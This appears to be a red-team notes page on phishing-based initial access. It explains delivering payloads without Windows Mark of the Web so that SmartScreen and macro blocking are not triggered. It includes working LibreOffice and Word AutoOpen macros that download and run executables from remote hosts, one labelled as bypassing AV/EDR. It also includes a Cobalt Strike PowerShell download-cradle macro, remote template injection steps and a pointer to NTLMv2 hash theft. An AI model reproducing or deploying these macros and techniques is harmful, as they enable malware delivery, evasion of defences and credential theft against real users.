Social Engineering
MOTW (Mark of the Web) is a metadata tag added by Windows to files downloaded from the internet. It’s stored as an Alternate Data Stream (Zone.Identifier) and tells the OS that the file came from an untrusted source (e.g., browser download, email attachment).
For Red Teamers, MOTW matters because it can trigger security features like SmartScreen, AMSI, or macro blocking in Office. Files marked with MOTW are more likely to be flagged, blocked, or require user interaction.
To increase payload execution success, it's crucial to deliver files without MOTW. Common ways to avoid it include:
Using internal delivery methods (e.g., compromised Exchange, shared drives)
Hosting files over SMB/WebDAV
Packaging payloads in ZIPs without MOTW (e.g., ZIPs created locally or transferred via trusted channels)
Using scripts or LOLBins that write the payload to disk without MOTW
Bottom line: No MOTW = fewer defenses triggered = higher success rate.
Macros
Macro for Libre Office
REM ***** BASIC *****
Sub InitialAccess
Shell("cmd /c powershell IWR -URI http://10.8.5.48:8081/http-vulnlabs-4444.exe -Outfile C:\Windows\Temp\http-vulnlabs-4444.exe")
Shell("cmd /c 'C:\Windows\Temp\http-vulnlabs-4444.exe'")
End SubMacro for MS Word
Loader Bypass AV/EDR: Bypass AV/EDR via DInvoke + Sliver
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
ByVal lpCmdLine As String, _
ByVal uCmdShow As Long) As Long
Sub AutoOpen()
URLDownloadToFileA 0, "http://10.8.5.48/Loader.exe", "C:\Windows\system32\spool\drivers\color\Loader.exe", 0, 0
WinExec "C:\Windows\system32\spool\drivers\color\Loader.exe", SHOW_HIDE
End SubWord Malicious Macro with Cobalt Strike
Simple Macro
Create a blank document
View > Macros > Select document
Generate a payload (Cobalt Strike Example for CRTO) RevShells.com
Attacks > Scripted Web Delivery (S)
Set URI Path
Set Host (nickelviper.com)
Set Port (80)
Set Listener HTTP/DNS
Set type: Powershell
Enable Use X64 Payload
Copy the payload and set it into the macro.
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""
End SubSave as
.doc.Send the file whether via email from a compromise Exchange to avoid the MOTW or any methods you want.
Remote Template injection
Create a blank document
View > Macros > Select document
Generate a payload (Cobalt Strike Example for CRTO) RevShells.com
Attacks > Scripted Web Delivery (S)
Set URI Path
Set Host (nickelviper.com)
Set Port (80)
Set Listener HTTP/DNS
Set type: Powershell
Enable Use X64 Payload
Copy the payload and set it into the macro.
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""
End SubSave as
.dot.Host the file (python server|Cobalt Striket Server)
Create a new black template
Save as
.docx
By using 1-zip click on file
Go to Word > _rels > settings.xml.rels
Modify the
targetparameter within thesettings.xml.relsfile with the.dotfile you created before and is hosted.
Send the file whether via email from a compromise Exchange to avoid the MOTW or any methods you want.
Capturing NTLMv2 Hashes
If you see you possess Write permission over public SMB share in your target domain or you see the website accepts uploading files you could use tools such as ntlm_theft to create a malicious files and steal NTLMv2 Hash
Some places to steal NTLMV2 Hashes
Last updated